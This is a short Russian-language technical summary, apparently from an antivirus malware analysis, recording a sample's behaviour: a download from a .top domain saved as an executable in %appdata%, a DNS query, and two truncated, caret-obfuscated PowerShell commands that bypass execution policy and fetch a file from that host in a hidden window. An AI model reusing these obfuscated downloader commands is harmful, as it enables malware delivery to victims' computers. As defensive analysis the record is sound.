Техническая информация
- http://smoeroota.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pOwerSH^eL^L.^E^XE ^-^e^X^e^CUTiO^N^POL^i^Cy B^Y^pa^sS -nOpR^Of^iLe^ -^w^iND^Ow^stY^le^ H^I^d^D^en (nEW-o^bJ^eCT SY^sT^Em.nE^t.webC^l^Ien^t).dO^WNLoAd^Fi^L^e^('http://smoeroota....
- DNS ASK sm###oota.top
- '<SYSTEM32>\cmd.exe' /C "pOwerSH^eL^L.^E^XE ^-^e^X^e^CUTiO^N^POL^i^Cy B^Y^pa^sS -nOpR^Of^iLe^ -^w^iND^Ow^stY^le^ H^I^d^D^en (nEW-o^bJ^eCT SY^sT^Em.nE^t.webC^l^Ien^t).dO^WNLoAd^Fi^L^e^('http://smoeroota....' (со скрытым окном)